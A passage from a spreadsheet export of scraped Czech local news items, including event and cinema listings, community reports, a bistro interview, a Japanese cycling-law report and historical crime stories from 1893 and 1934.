LEGO herna pro dospělé, nutná rezervace 4. 11. 15.00 → Pohádková babička čte dětem 4. 11. 17.00 → Tvůrčí psaní s Viktorem Špačkem, nutná rezervace 5. 11. 14.30 → Trénování paměti, nutná rezervace 6. 11. 17.00 → Tvůrčí kurz: poezie haiku I. nutná rezervace 6. 11. 19.00 → Spolu na Petřinách : Paměť sídliště Petřiny 11. 11. 16.30 → Přednášky se zahradnicí, nutná rezervace 12. 11. 16.00 → Beseda s Romanem Štětinou o podcastu Umění pro město, nutná rezervace 12. 11. 19.00 → Zkrocení vnitřního kritika, vstupné 60 Kč 13. 11. 12.00 → Artotéka na Petřinách , nutná rezervace 13. 11. 16.00 → Playstation na Petřinách, nutná rezervace 13. 11. 17.00 → Anglické listy po sto letech, nutná rezervace 14. 11. 15.00 → Výtvarný kurz, nutná rezervace 15. 11. 16.00 → Knižní workshop s Ivou Krupicovou, nutná rezervace 16. 11. 10.30 → Mladí ladí dětem-Timbalooloo, nutná rezervace 16. 11. 14.00 → Ilustrované pexeso, nutná rezervace 18. 11. 16.30 → Přednášky se zahradnicí, nutná rezervace 19. 11. 18.00 → Vánoce ve světě, vstupné 60 Kč 20. 11. Drum Circle - bubnování v kruhu, vstupné 60 Kč. 17.30 rodiny s dětmi 18.30 dospělí 20. 11. 17.00 → Tvůrčí kurz: poezie haiku II, nutná rezervace 21. 11. 13.00 → Digitální poradna 21. 11. 14.00 → Dílna adventních věnců, nutná rezervace 22. 11. 13.30 → Podzimní tvořivá dílna 23. 11. 10.00 → Maňásková komedie: Pepíno má domeček, vstupné 100 Kč 23. 11. 10.30 → Mladí ladí dětem-Timbalooloo, nutná rezervace 23. 11. 14.00 → Workshop: Adventní kalendář, nutná rezervace 23. 11. 14.00 → Klub deskových he 25. 11. 16.30 → Setkání se zahradnicí, nutná rezervace 26. 11. 17.30 → Cestovatelská beseda o Jihoafrická republika 27. 11. 16.00 → Beseda se spisovatelkou Danielou Krolupperovou 27. 11. 16.00 → Playstation na Petřinách, nutná rezervace 27. 11. 19.00 → Feng Shui – Typologie člověka, vstupné 60 Kč 28. 11. 15.00 → Výtvarný kurz, nutná rezervace 29. 11. 18.00 → Festival Book the Film – studentský film 29. 11. 14.00 → Dílna adventních věnců, nutná rezervace 30. 11. 10.30 → Mladí ladí dětem-Timbalooloo, nutná rezervace 30. 11. 14.00 → Festival Book the Film KINO 2. 11. 15.00 Medvídek panda Africe 5. 11. 16.00 Vlny 7. 11. 17.00 Velký finále PSO 19.00 Výjimečný stav 9. 11. 15.00 Arrietty ze světa půjčovníčků 12. 11. 16.00 Až na věky 14. 11. 17.00 Tizian – říše barev 19.00 Amerikánka 16. 11. 15.00 Rozzum v divočině 19. 11. 16.00 Hypnóza 21. 11. 17.00 Veni Vidi Vici 19.00 Rok vdovy 23. 11. 15.00 Buffalo Kids 26. 11. 16.00 Konec světa 28. 11. 17.00 Benátky – nekonečně avantgardní 19.00 Anora</t>
  </si>
  <si>
    <t>35000</t>
  </si>
  <si>
    <t>20241101_153_3245201136_c4e41d250baf62c6d9a8.html</t>
  </si>
  <si>
    <t>c4e41d250baf62c6d9a8</t>
  </si>
  <si>
    <t>Festival piva s koncerty i soutěžemi</t>
  </si>
  <si>
    <t>Festival piva s koncerty i soutěžemi Na začátku října se konal druhý ročník zbraslavského Festivalu minipivovarů. Vedle ochutnávání různých značek piv a dobrého jídla bylo možné soutěžit v pivním slalomu nebo v držení sudu na čas. O dobrou náladu se z pódia před Městským domem starala Vejvodova kapela, následoval koncert Big Bandu Biskupská a večer zakončilo vystoupení skupiny ABBA Star. Starostka Zbraslavi Kateřina Pavlíková přivítala na festivalu kromě všech příchozích také senátora Pavla Fischera , starostu Velké Chuchle Jana Křena i místostarostu Radotína Miroslava Knotka. Příští rok se můžete těšit už na třetí ročník zbraslavského pivního festivalu! O večerní zábavu se postaral koncert kapely ABBA Star. Ochutnávat bylo možné piva malých producentů. Dirigování Vejvodovy kapely se ujal Josef Vejvoda . Do pivních soutěží se zapojili nejen muži, ale také ženy. Starostka Zbraslavi Kateřina Pavlíková se senátorem Pavlem Fischerem (vpravo) a se starostou Velké Chuchle Janem Křenem Nechyběly stánky s nejrůznějšími pochutinami. Autor: (red) Foto: Petr Buček</t>
  </si>
  <si>
    <t>1800</t>
  </si>
  <si>
    <t>20241101_154_3245194963_342e33d121ee765ecbc2.html</t>
  </si>
  <si>
    <t>342e33d121ee765ecbc2</t>
  </si>
  <si>
    <t>Říjnové dění v Mateřské škole Korálek</t>
  </si>
  <si>
    <t>Říjnové dění v Mateřské škole Korálek Jak probíhal začátek podzimu v dobřejovické mateřské škole Korálek ? Měsíc říjen se ve třídě Delfínů nesl v duchu tvůrčích a zábavných aktivit. V rámci projektu „Letem světem“ se předškoláci postupně seznamují s naší vlastí, tedy Českou republikou . Obkreslují mapy, vyrábí tablo, rozšiřují si nejen zeměpisné znalosti, ale také jemnou motoriku a prostorové vnímání. Celým školním rokem je bude provázet dřevěná loutka Lipáčka. Ve třídě Broučků se děti seznamují se vzdělávacím programem prostřednictvím oblíbených pohádkových postaviček z Večerníčků. První z nich byl Krtek, který děti nadchl svou dobrodružnou příhodou „Jak ke kalhotkám přišel“. Nejenže jsme si společně zdramatizovali příběh, ale také si každý kalhotky vyrobil z papírové čtvrtky a nazdobil je. Podzimní počasí je ideální příležitostí k prohlubování znalostí formou povídání o počasí, změnách v přírodě, jako je padání listí, sbírání kaštanů, o tom jak se zvířátka připravují na zimu. Děti se učí rozlišovat podzimní plody, jako jsou jablka, hrušky a dýně, a seznamují se s tradičními podzimními svátky. Autor: • za děti a kolektiv MŠ Jana Horká Autor person Jana Horká</t>
  </si>
  <si>
    <t>630</t>
  </si>
  <si>
    <t>20241101_155_3245195128_096c6e18e49f604fcdcd.html</t>
  </si>
  <si>
    <t>096c6e18e49f604fcdcd</t>
  </si>
  <si>
    <t>Špacír 2024</t>
  </si>
  <si>
    <t>Špacír 2024 Dne 12. října 2024 se konala tradiční procházka po čtyřech okolních obcích - Špacír. Řada účastníků využila k cestě na start do Nebřenic autobusovou linku a autobus byl, k údivu pa- Bna řidiče, plně obsazen. rzy ráno se účastníci letošního pochodu sešli v restauraci La Bottega na nebřenickém golfovém hřišti. Tam už byla díky obci Popovičky, pod kterou Nebřenice spadají, připravena bohatá snídaně: míchaná vejce, křupavá bagetka, čaj, svařák a welcome drink. Po deváté hodině přivítal všechny hosty za organizátory pan Szalai z Modletic společně s nově zvoleným starostou Popoviček Tuháčkem. Pánové nám popřáli šťastnou cestu a vyrazili jsme na trasu. Hned na začátku cesty jsme obdivovali množství hub podél trasy, která vedla nebřenickým lesem, dále pokračovala kolem golfového hřiště až k modletické hasičárně. Tam nás už čekali místní hasiči s pohoštěním. Výborné klobásky, párek v rohlíku, pivo a limonáda přišly vhod. Po občerstvení a společném fotografování u modletické hasičárny jsme pokračovali dále, okolo kurtů a společnosti SOPO po cyklostezce do Dobřejovic . V Dobřejovicích jsme prošli okolo památníku Legionáře k nově otevřené restauraci na hřišti, která má příznačný název Jedenáctka. I zde bylo připraveno spoustu občerstvení, například úžasné jednohubky a kynuté koláčky ze Staročeské pekárny. V restauraci Jedenáctka byly nealkoholické nápoje všeho druhu, káva a pivo , které čepoval hostům pan starosta. Po bohatém občerstvení a humorném jazykovědném dohadování se sousedy, zda se vydáme na cestu do Herinku či Herinka, jsme zjistili, že správně je to do Herinku. Novinkou v této obci je připravovaný chodník, který nás příští rok dovede bezpečně do centra jejich obce. V Herinku byla poslední zastávka a také tam bylo samozřejmě připravené pohoštění. Počasí nám opravdu přálo a Špacír měl jako vždy velkou účast dospělých, dětí a samozřejmě nechyběli ani pejsci se svými páníčky. Celkem se akce zúčastnilo kolem osmdesáti občanů ze všech zúčastněných obcí. Cesta trvala přibližně pět hodin, to však jen díky zastávkám v každé obci. Ušli jsme něco málo přes 10 km. Záměr Špacíru, podívat se co je v které obci nového a příležitost pro setkání sousedů z okolních obcí, byl naplněn. Už nyní se těšíme na jubilejní desátý ročník. Věříme, že se opět sejdeme v hojném počtu! Přejí vám krásné babí léto. Autor: • Pavla Mikušková, předsedkyně kulturní komise Autor person Pavla Mikušková</t>
  </si>
  <si>
    <t>20241101_156_3245379984_9eda7ac9808104f08c2f.html</t>
  </si>
  <si>
    <t>9eda7ac9808104f08c2f</t>
  </si>
  <si>
    <t>Únos z ložnice</t>
  </si>
  <si>
    <t>Únos z ložnice Je to už 90 let, psal se rok 1934, kdy se u manželů Peřinových v Dolních Měcholupech ubytoval podnájemník Miláček. Ne snad, že by mu tak říkali podle Maupassantova románu, on se opravdu jmenoval Ladislav Miláček. Byl to vysoký, urostlý 28 letý brunet, jak psal tehdejší tisk – těžká váha v kráse. Pan Peřina byl sice také velkého vzrůstu, ale poněkud subtilnější postavy a užších ramen, čili kratší odvěsna trojúhelníku, jehož byla paní Peřinová přeponou. Celých pět měsíců, co společně žili pod jednou střechou, pan Miláček nezašel do hospody a večer co večer se držel doma. „Takového nájemníka bychom hned tak nenašli,“ libovali si manželé Peřinovi. Teprve náhoda, jakýsi zachycený milostný vzkaz na lístku, otevřela klamanému manželovi oči. Zlost s ním začala cloumat a nájemníka z bytu vyhodil. Pan Miláček si neochotně sbalil svých pár švestek a odstěhoval se do nedaleké Hostivaře , což bylo co by kamenem dohodil. Čtrnáct dní se trápil steskem, ale pak se rozhodl jednat. Navštívil manžele Peřinovi a jal se vyjednávat, že prý aby mu pan Peřina manželku přenechal. Ten ho ale opět vyhodil. Pan Miláček podlehl stesku úplně a šel ho zahnat do hostince paní Mezerové v Hostivaři . Pil, pil, pil… Po šestnáctém pivě , krátce před půlnocí, se rozběhl opět do Dolních Měcholup , do domku, kde v prvním patře bydlela jeho láska. Dovnitř vnikl pomocí žebříku okénkem u toalety. V kuchyni už spal nový podnájemník, jakýsi obuvník Šimek, ale toho si Miláček ani nevšiml. Ze zdi sundal petrolejovou lampu, šel do ložnice, tam ji rozsvítil a při jejím světle se jal paní Peřinové vyznávat lásku: „Podívej, Máňo, ty víš, že tě mám rád jako holub holubičku. Já už to takhle dál nesnesu. Já bez tebe nedokážu žít!“ „Co to tady povídáš, vždyť to je moje žena,“ rozkřikl se Peřina. Tohle Miláčka dohřálo a s výkřikem: „Bídáku, mám na ní větší právo než ty! Buď já, nebo ty!“ skočil na pana Peřinu a tloukl ho do hlavy a škrcením si vynucoval jeho souhlas s odchodem manželky. Vyděšená Peřinová volala na podnájemníka Šimka spícího vedle v kuchyni, aby zasáhl. Ten se nechtěl do ničeho plést, aby náhodou nepřišel k úhoně, a raději došel pro pana domácího. Ten sice přišel a z kuchyně napomenul běsnící trojúhelník v ložnici, jehož obě odvěsny spolu zápasily o přeponu. Klid, který nastal, ale netrval dlouho. Nakonec paní Peřinová souhlasila, a že tedy do té Hostivaře půjde a přiškrcený Peřina k tomu udělil souhlas. A to byl skutek, kvůli němuž stanul Ladislav Miláček před trestním senátem. Únos, při němž byla muži v jeho přítomnosti unesena žena přímo z lože. Co na tom, že ji pan Miláček neunášel v náručí, že s ním šla sama až do Hostivaře ! Žaloba obvinila neústupného milence z vydírání a omezování osobní svobody. Když totiž odcházel z bytu Peřinových, otočil klíč u dveří od bytu a zamkl tam opuštěného manžela. Ze zajetí ho vysvobodil až po několika hodinách pan domácí. U soudu se hájil pan Miláček stručně a jasně: „Byl jsem opilý. Peřinovi jsem natloukl, ale teprve potom, co se se mnou začal hádat. Co jsem mu říkal, nevím. Po Peřinové jsem nechtěl, aby šla se mnou. Ona najednou vstala a šla se mnou sama. Klíčem jsem otočil jen tak ze zvyku.“ Manžel unesené u soudu vylíčil, jak se o vztahu podnájemníka k jeho ženě dozvěděl, a odpovídal na otázky vyšetřujícího soudce: „Řekl obžalovaný, že si jde pro vaši ženu?“ „To neřekl.“ „A myslíte, že si ji chtěl odvést?“ „To, prosím, nevím.“ „Proč vás tedy tloukl a vyhrožoval?“ „To si nedovedu vysvětlit…“ „On tu říká, že byl tehdy opilý a měl šestnáct piv . Víte něco o tom, kolik toho snese?“ „Moc, pane soudce, jednou vypil 30 piv a ještě jel 100 km rychlostí na motocyklu!“ „Vy jste to viděl?“ „Ne, on mi to říkal.“ Hostinská Mezerová také u soudu potvrdila, že měl tehdy obžalovaný náladu. Předseda se dále ptal svědka – manžela: „Vaše paní se k vám vrátila?“ - „Ano.“ „Vy jste jí všechno odpustil?“ - „Ano.“ „I to, že s ním odešla do jeho bytu?“ - „Ano, ona, když na mě útočil, řekla, že s ním půjde, ale mně pošeptala do ucha, ať jdu pro četníky.“ Ladislav Miláček byl odsouzen na čtyři měsíce těžkého žaláře. Jak to s jeho láskami bylo po propuštění, zda se napravil, to můžeme jen hádat. Reportér přinášející zprávu ze soudní síně připsal na její závěr doporučení: Mladý muži, kterýž čteš tyto řádky, vezmi si ponaučení a nevěř ani nejlepšímu příteli svému a nikdy ho neber do společné ložnice jako podnájemníka, máš-li mladou ženu. Neboť v takovém případě čert nikdy nespí! A tak to bylo tenkrát v Hostivaři . Mezerova restaurace (vpravo) při stavbě hostivařské sokolovny, 1931 U restaurace paní Mezerové stávalo fotbalové hřiště SK Hostivař Autor: Pavlína Nejedlíková Autor person Pavlína Nejedlíková</t>
  </si>
  <si>
    <t>20241101_157_3245286326_04349c4d40626fbb79d8.html</t>
  </si>
  <si>
    <t>04349c4d40626fbb79d8</t>
  </si>
  <si>
    <t>V prostorách Domu kultury se rozvoněla vůně čerstvě pečeného chleba a kávy</t>
  </si>
  <si>
    <t>V prostorách Domu kultury se rozvoněla vůně čerstvě pečeného chleba a kávy Kavárna &amp;amp; Bistro u Kronose Jejich křupavý chléb, kvásková focaccia s uzeným lososem, croissant, new york rolls cupcaky, nebo nadýchání šneci z kváskového těsta s jablky a slaným karamelem mizí hned po vytažení z trouby. Frenštátské Bistro u Kronose , které od poloviny října funguje v prostorách frenštátského Domu kultury, provozují absolventi místní Hotelové školy, Martina Polášková a Jindřich Drha. Tito dva mladí nadšenci totiž nejsou ve Frenštátě pod Radhoštěm tak úplně neznámí. Už rok provozují bufet ve frenštátském kině s předzahrádkou, kterou oceňují především rodiče s malými dětmi, kteří zavítají na vedlejší dětské hřiště. Našli jsme si chvilku a společně si povídali nejen o novém bistru. Co vás přivedlo k myšlence otevřít bistro? V gastronomii se oba pohybujeme již dlouho, takže jsme se rozhodli, že chceme investovat své zkušenosti a potenciál do něčeho, co nám bude dávat smysl a bude nás to naplňovat. Co vás na vaření a pečení baví nejvíce? Jindra: Na vaření mě baví objevování nových chutí a kombinací. Gastronomie je strašně fajn, protože se máte pořád co učit. Tajemství úspěchu tkví v kombinaci kvalitních surovin, domácího pečiva a příjemné atmosféry. Náš sortiment je založený na řemeslném kváskovém pečivu, nabídka se mění, aby to nebylo pořád dokola. Teď připravujeme mimo jiné hotdog v kváskové briošce, nebo například chleba se škvarkovou pomazánkou a další chuťovky k pivu a vínu. Martina: Péct kváskové pečivo je určitě náročné a je to hodně o plánování a respektu k potřebám jednotlivých druhů těst a kvásků. A přesně to mě baví, že to není jednoduché. Focaccia s uzeným lososem zní jako dokonalá kombinace. Jaké další netradiční náplně plánujete vyzkoušet? Martina: My se hezky doplňujeme. Já něco upeču a Jindra umí dobře náplně. Kromě studené kuchyně se Jindra realizuje v našem food trucku na smash burgerech, trhačkách, pečených žebrech apod. Jaké jsou vaše plány pro Bistro u Kronose ? Chceme Bistro u Kronose proměnit v živé kulturní centrum. Kromě tradičních firemních večírků plánujeme pořádat vlastní akce jako například tematické degustace rumu, přednášky odborníků na sportovní psychologii či rodinné vztahy, setkání se spisovateli a hudební večery. V lednu se můžete těšit na speciální kávový večer ve spolupráci s pražičem Tomášem Kocábem. A pochopitelně budeme poskytovat zázemí i v době konání kulturních akcí v Domě kultury. Snažíte se podporovat místní producenty? Ano, podpora místních producentů je pro nás velmi důležitá. Věříme, že kvalitní produkty z našeho regionu si zaslouží pozornost. Proto se snažíme nabízet co nejvíce místních specialit. V oblasti nápojů jsme se zatím zaměřili na piva . Kromě známého Pivovaru Litovel nabízíme i menší, řemeslné pivovary jako Dejf ze Studénky . Vyhledáváme pivovary, které kladou důraz na tradiční výrobní postupy a používají kvalitní suroviny. Martina a Jindřich Bistro u Kronose v prostorách Domu kultury Autor: Děkuji za rozhovor, Romana Stejskalová Autor person Romana Stejskalová</t>
  </si>
  <si>
    <t>1300</t>
  </si>
  <si>
    <t>20241101_158_3244626680_6d10d96933b5e321b9bb.html</t>
  </si>
  <si>
    <t>6d10d96933b5e321b9bb</t>
  </si>
  <si>
    <t>Frenštát se rozzáří vánočními světly</t>
  </si>
  <si>
    <t>Frenštát se rozzáří vánočními světly V sobotu 29. listopadu od 8 hodin ráno se náměstí opět zaplní stánky s řemeslnými výrobky, svátečním občerstvením a vůní svařeného vína i vánočního pečiva. Adventní slezský rynek odpoledne vystřídá rozsvícení vánočního stromu na náměstí, kde je připraven program pro malé i velké. Náměstí ožije vystoupeními dětí z místních školek a škol. -red-</t>
  </si>
  <si>
    <t>20241101_159_3245499205_57eba4c5ca1d13482aab.html</t>
  </si>
  <si>
    <t>57eba4c5ca1d13482aab</t>
  </si>
  <si>
    <t>Kulturně komunitní centrum Horní Počernice</t>
  </si>
  <si>
    <t>Kulturně komunitní centrum Horní Počernice Bezplatná psychologická poradna vedená Mgr. Kateřinou Čížkovou, BCBA každou středu od 13.00 do 17.00 hod. Do poradny je třeba se předem objednat na telefonu: 728 480 434. Bezplatná právní poradna vedená JUDr. Barborou Lukšovou Frantovou každé úterý od 13.00 do 17.00 hod. Do poradny je třeba se předem objednat na telefonu: 271 071 790, 770 155 868. Bezplatná dluhová poradna vedená Petrem Schneedörflerem každé pondělí od 12.00 do 16.00 hod. Do poradny je třeba se předem objednat na telefonu: 728 310 005. Bezplatné otevřené hodiny angličtiny s rodilým mluvčím vedené Jonem-Paulem Ottem každé úterý od 15.15 do 16.45 hod. PROGRAM NA LISTOPAD Zarezervujte si místo na naších akcích přímo na našem webu: https://www.knihovnapocernice.cz/kulturne-komunitni-centrum/ 7. listopadu od 16.00 do 17.15 hod. Trénování paměti Zaměříme se na obtíže spojené s krátkodobou pamětí a koncentrací. Velikost skupiny trénování paměti je 12 míst. Lekci vede certifikovaná trenérka paměti 1. stupně Mgr. Hana Filipová, DiS. 12. listopadu od 16.00 do 18.00 hod. Tvořivé dílničky pro děti: Záložky do knížky Na podzim bývá počasí nevlídné – perfektní čas zalézt si pod deku a číst si. Abyste se mezi stránkami už nikdy neztratili, přijďte si s námi vyrobit záložku. Předložíme vám pár návrhů a poskytneme spoustu materiálu. Co z něj vymyslíte, bude jen na vás. Techniky: stříhání, lepení, vybarvování pastelkami a fixy. S sebou: pracovní tričko, nůžky, velcí jedlíci malou svačinku, pití a dobrou náladu. Pro děti od 8 do 12 let (max. 10 dětí). Dílničku vede Helena Hamplová. 13. listopadu od 18.30 do 21.15 hod. Seminář: Jak na vztek Emoce vzteku je přirozená a má funkci hlídat naše hranice. Potlačený nebo naopak přemrštěný vztek nám může škodit a ubližovat ostatním. Jak na zdravé zpracování a ventilování vzteku se podíváme na tomto setkání. V semináři budou použité techniky arteterapie, vizualizace, meditace, hudby a pohybu. Nemusíte umět malovat, není důležitý výsledek, ale prožitek. Otevřená skupina, můžete se zúčastnit jednoho nebo více setkání. Seminář vede Ing. Maria Půrová. 14. listopadu od 18.00 do 20.00 hod. Klíčové dialogy – písničky a povídání s Rostislavem Jankovcem o tom, jak je naše naladění zásadní na naší životní cestě. 20. listopadu od 17.00 do 19.30 hod. Workshop: Drátovaný adventní věnec Advent pomalu klepe na dveře, a proto je nejvyšší čas vyrobit si věnec. A tentokrát netradiční – drátovaný. Se svíčkami nebo bez, ozdobený korálky , dřevěnými hvězdičkami nebo jen tak minimalistický z černého drátu. Záleží jen na vás a vaší kreativitě, jaký bude. Workshop je vhodný pro začátečníky i mírně pokročilé, vše potřebné se naučíte na místě. Kromě výuky drátování na vás čeká drobné občerstvení, příjemná tvůrčí atmosféra a báječná relaxace. Workshop vede Barbora Šmídová . Bližší informace a rezervace na: www.bajasmidova.cz, sekce Workshopy pro veřejnost. 21. listopadu od 17.30 do 19.30 hod. Zážitky z cest: Argentina a tři okolní země Cestovatel Jiří Kafka nás zavede k dechberoucím, největším vodopádům světa Foz Iguacu rozprostírajícím se na hranici Brazílie s Argentinou . Na skútru se projedeme Paraguayí . V Buenos Aires navštívíme historické i chudinské čtvrti, zajdeme na fotbal a zavítáme i do vnitrozemí země nejlepších hovězích steaků. Závěrem doplujeme na hlavního města Uruguaye – Montevidea , proslulého koloniální architekturou. 27. listopadu od 17.00 do 19.00 hod. Workshop: Výroba adventních věnců Dílnu povede Zuzana Janovicová. 28. listopadu od 17.30 do 19.30 hod. Zážitky z cest: Mongolsko Navštivte společně s Dankou nejméně osídlenou zemi bez wi-fi, často i mobilního signálu a na většině území bez elektřiny, kde soulad pastevců s přírodou je na prvním místě. Teploty ve stepích zde v zimě dosahují běžně -30° a léto je opravdu velmi krátké. Součástí přednášky je i čtení z nového románu Rok zmatků. O zážitky se s námi podělí spisovatelka Danka Šárková . n</t>
  </si>
  <si>
    <t>6400</t>
  </si>
  <si>
    <t>20241101_16_3264642442_80237aeab99bb6323fe2.html</t>
  </si>
  <si>
    <t>80237aeab99bb6323fe2</t>
  </si>
  <si>
    <t>Rok vězení za telefon v ruce během jízdy na kole. Nový zákon v Japonsku zpřísňuje tresty pro cyklisty V Japonsku v pátek vešel v platnost zákon ukládající vězení a pokuty cyklistům, kteří používají při jízdě mobilní telefon nebo jsou pod vlivem alkoholu . Nejvyšší pokuta činí v přepočtu 152 000 korun, maximální délka odnětí svobody pět let, píše agentura Kjódó. Tokio 21:50 1. listopadu 2024 Pokud cyklisté s telefonem v ruce způsobí nehodu, mohou jít do vězení až na jeden rok | Foto: Stanislav Kogiku / SOPA Images/Sipa USA | Zdroj: Reuters Lidem, které policie přistihne při používání mobilního telefonu při jízdě na kole, ode dneška hrozí vězení až na šest měsíců nebo pokuta až 100 000 jenů (přes 15 000 korun). Pokud cyklisté s telefonem v ruce způsobí nehodu, mohou jít do vězení až na jeden rok nebo budou muset zaplatit až 300 000 jenů (necelých 46 000 korun). Dosud byla maximální výše pokuty 50 000 jenů (více než 7600 korun). Zákon přísněji postihuje také jízdu na kole pod vlivem alkoholu . Pokud policie naměří cyklistům více než 0,15 miligramu alkoholu v dechu, hrozí jim až tříletý trest vězení nebo pokuta až půl milionu jenů (přes 76 000 korun). Vážnější trestné činy zaviněné cyklistou s alkoholem v krvi mu mohou vynést až pět let vězení nebo finanční postih ve výši jeden milion jenů (přes 152 000 korun). Krátce poté, co zákon začal platit, oznámila policie v prefektuře Ósaka na jihu Japonska udělení první pokuty za jízdu pod vlivem alkoholu a vyšetřování dalších šesti případů. Podle Kjódó se stalo mezi lety 2013 až 2017 celkem 295 nehod, které způsobili cyklisté používající telefon. V letech 2018 až 2022 narostl počet nehod o 53,9 procenta na 454. V České republice jsou postihy výrazně mírnější. Pokud cyklista použije za jízdy mobilní telefon, hrozí mu pokuta až 10 000 korun. Pokud nadýchá do jedné promile, hrozí mu pokuta do 25 000 korun, nad jednu promile pak až 50 000 korun. ČTK</t>
  </si>
  <si>
    <t>89850</t>
  </si>
  <si>
    <t>114520</t>
  </si>
  <si>
    <t>20241101_160_3244281954_2f8f17483c3f1a5f138f.html</t>
  </si>
  <si>
    <t>2f8f17483c3f1a5f138f</t>
  </si>
  <si>
    <t>PeprmintovĂ˝ likĂ©r s chilli Green Deal</t>
  </si>
  <si>
    <t>PeprmintovĂ˝ likĂ©r s chilli Green Deal 1. listopad 2024 České nápoje komentáře (0) 250 x Značka Fruko -Schulz přichází s novinkou, která potěší všechny milovníky netradičních chutí – Green Deal likér s chilli. Tento jedinečný nápoj v sobě snoubí svěží peprmint s pálivým chilli, což vytváří neobyčejný chuťový zážitek, který překvapí při každém doušku. Likér obsahuje 25 % alkoholu a je vyrobený z 99 % z českých surovin, což zaručuje vysokou kvalitu a čerstvost ingrediencí. Výrobcem je tradiční česká likérka Fruko -Schulz, která se pyšní více než stoletou historií a specializuje se na širokou škálu lihovin, včetně legendárního jindřichohradeckého Tuzemáku s plachetnicí. Peprmintový likér s chilli Green Deal Při prvním ochutnání Green Deal likéru s chilli vás na začátku přivítá sladká, osvěžující chuť peprmintu, která přejde do příjemné pálivé chuti chilli. Tato kombinace chutí dělá z likéru nejen výbornou volbu k samostatnému popíjení, ale i skvělou ingredienci pro přípravu míchaných nápojů. Green Deal likér tak dodá vašim drinkům pikantní a osvěžující šmrnc. Likér Green Deal s chilli je dostupný ve dvou velikostech – 0,5 a 0,7 litru. Cena za 0,5l lahev likéru je 249 Kč, což z něj činí atraktivní volbu nejen pro ty, kteří vyhledávají něco nového, ale také pro každého, kdo chce podpořit českou produkci. Navíc díky svému původu a kvalitě se stává ideálním dárkem pro vaše přátele. Koncept pojmenování likéru "Green Deal" čerpá inspiraci z aktuálních společenských témat, konkrétně debaty kolem evropského plánu Green Deal. Tento název odráží nejen kontroverzi, ale i pokus o odlehčení této vážné diskuse typicky českým způsobem – s humorem a alkoholem . Likér Green Deal staví na myšlence, že i kontroverzní téma může spojit lidi, pokud se k němu přistoupí s nadhledem. Spojení peprmintu a chilli vytváří neotřelý chuťový zážitek, který symbolizuje ostré názory i sladkou dohodu, ke které lze dojít u společné skleničky v hospodě. Spojení peprmintu a chilli v Green Deal likéru je ukázkou inovativního přístupu a odvahy k nevšedním kombinacím. Tento likér je ztělesněním české kreativity a dovednosti v oblasti výroby lihovin, které si uchovávají svou jedinečnost a kvalitu. Ať už se bavíte s přáteli, nebo chcete obohatit svůj večer netradičním nápojem, Green Deal s chilli je skvělou volbou pro každou příležitost. Zdroj: Tisková zpráva Autor: Autor: | České nápoje || České nápoje</t>
  </si>
  <si>
    <t>20241101_161_3245467430_f2edcd646539b4c88c1e.html</t>
  </si>
  <si>
    <t>f2edcd646539b4c88c1e</t>
  </si>
  <si>
    <t>Osudná vášeň</t>
  </si>
  <si>
    <t>Shrnutí Osudná vášeň Byla neděle 16. dubna 1893 k jedné hodině odpolední, když se v kavárně Central na rohu ulic Havířské a Na Příkopě objevil prodejce uherského vína a koňaku Alexander (Šándor) Subotič a domáhal se rozmluvy s majitelkou podniku Josefinou Kateřinou Angerovou. Personál dobře věděl, o koho jde, a pokoušel se muže zastavit. Neuplynul přitom ani rok od chvíle, kdy jednapadesátiletá Josefina Angerová, „milá, půvabná kavárnice s prošedivělými vlasy, jejíž rysy si navzdory pokročilým létům zachovaly svěžest a vkus,“ jak ji posléze popsal německý deník Prager Tagblatt, ovdověla. Josef Anger zemřel počátkem července 1892 v ústavu pro choromyslné v Linci. Během svého života vedli se ženou řadu pražských kaváren, ale také hotel U Císaře rakouského na Poříčí či vinárnu Austria na rohu Poštovské (dnes Karoliny Světlé ) a Karlovy ulice. Kavárnu Central , jednu z nejznámějších v Praze , si manželé najali v roce 1880. Poté však Josef Anger onemocněl a Josefina Angerová ho nechala převézt do zmíněného ústavu v Linci (Anger pocházel z dolnorakouského Bausbrunnu). Do jejího života vstoupil po manželově smrti nový muž. „Před půl rokem seznámila se důvěrně s A. Subotičem, který ji častěji navštěvoval. Byl do ní náruživé zamilován a chtěl ji pojmouti za manželku,“ líčily Národní listy. Také Josefina Angerová zdála se nyní jako vyměněná. Po letech trápení, které jí přinesla manželova nemoc i starost o kavárnu, teď po boku o čtrnáct let mladšího muže jenom zářila. Její nadšení nesdíleli ovšem příbuzní, důvěrné přítelkyně, dokonce ani staří zaměstnanci kavárny, kteří se vdově snažili mladého obchodníka s vínem rozmluvit. Podobné to bylo na opačné straně věkově nerovného vztahu. Zejména matka a starší bratr Jiří, jenž byl ve skutečnosti majitelem firmy, pro kterou Alexander Subotič pracoval, kladli muži na srdce, „aby na vdovu nemyslil a neusiloval o uskutečnění sňatku, jemuž z obou stran kladou se nepřekonatelné překážky,“ popisoval nepřízeň okolí tisk. „Aby ho přivedl na jiné myšlenky, poslal pan Jiří Subotič svého bratra Alexandra na delší cesty do Krakova , Lvova a do Slezska . Alexandr odjel sice, ale za několik dní opětně v Praze se objevil, jen aby mohl navštívit paní Angerovou.“ Vše bylo marné. Alexander Subotič „nehleděl na to, že jest žena tato o čtrnáct let starší, nadcházel jí všemožně, dvořil se jí jako mladík dívce, nabízel jí své srdce, až pí. Angerová prosby jeho vyslyšela a zapředla s ním milostný poměr, jejž udržovala půl roku“, shrnuly milostnou zápletku Národní listy. Netrvalo pak dlouho, když Josefina Angerová rodině a blízkým oznámila, že vyhověla naléhání mladšího milence a bude se vdávat. V tu chvíli se příbuzní proti Subotičovi ještě více zatvrdili. Znovu a znovu přesvědčovali vdovu, že mladému muži jde jen o to, aby mohl vládnout nad zavedenou kavárnou, že svůj cit a vášeň pouze předstírá, že věkový rozdíl se nepochybně záhy projeví a ona, „žena na prahu stáří,“ jak ji v jednapadesáti letech popisoval Prager Tagblatt, se hořce zklame. Tentokrát, zdá se, padlo jejich přesvědčování na úrodnou půdu. „Anna Angerová stala se náhle k Subotičovi chladnější, ba chtěla se ho zbaviti. Ale neměla dost odvahy, aby mu to přímo do očí řekla,“ líčily dále Národní listy. Až v sobotu 15. dubna, tedy v předvečer popisovaných událostí, když ji „několik hodin přemlouval, by nedbala přesvědčování příbuzných“, sdělila mladému muži své definitivní rozhodnutí. Zásnuby se ruší. Svatba nebude. Stala se ovšem zvláštní věc. Když kolem jedenácté večer jindy vznětlivý až cholerický Subotič odcházel, vypadal překvapivě klidně a vyrovnaně. Hrůzný obraz Nadešla osudná neděle. Když krátce před jednou vešel Subotič do zázemí kavárny, zastoupila mu cestu věrná hospodyně majitelky Terezie Rittbergerová s tím, že paní jest „nemocna na krku“ a přikázala, aby k 